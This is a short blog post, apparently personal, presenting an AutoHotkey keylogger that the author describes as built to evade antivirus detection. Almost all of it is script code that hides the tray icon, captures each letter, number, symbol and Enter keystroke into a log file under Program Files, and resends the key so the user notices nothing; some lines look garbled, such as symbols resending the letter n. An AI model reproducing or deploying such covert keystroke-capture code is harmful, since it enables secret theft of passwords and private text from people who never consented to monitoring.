after many attempts, i m able to bypass antivirus but it create unnecessary overhead.so i decided to develop my own keylogger which is not dected by any antivirus as "torjan"
step1.install a software called hotkey ,download from www.autohotkey.com/
step2. code for developing own keylogger as given below in brief :
The Code:
logfile = %ProgramFiles%log.txt ;is where we store our log
; -- this is where we will put our log file.
#NoTrayIcon
; by default autohotkey scripts have a tray icon - this turns it off
SendMode Play ;
#SingleInstance force
; a couple of AHK specific commands
a::
FileAppend,
(a), %logfile%
Send a
return
b::
FileAppend,
(b), %logfile%
Send b
return
c::
FileAppend,
(c), %logfile%
Send c
return
;..snip... and so on for all of the letters
1::
FileAppend,
(1), %logfile%
Send 1
return
{Numpad1}::
FileAppend,
(1), %logfile%
Send 1
return
2::
FileAppend,
(2), %logfile%
Send 2
return
{Numpad2}::
FileAppend,
(2), %logfile%
Send 2
return
3::
FileAppend,
(3), %logfile%
Send 3
return
{Numpad3}::
FileAppend,
(3), %logfile%
Send 3
return
;...snip... and for the numbers
{!}::
FileAppend,
(!), %logfile%
Send n
return
{#}::
FileAppend,
(#), %logfile%
Send n
return
;...snip... and symbols
{Enter}::
FileAppend,
(
), %logfile%
Send n
return
;also watches for ENTER so as to clean up the file.
No comments:
Post a Comment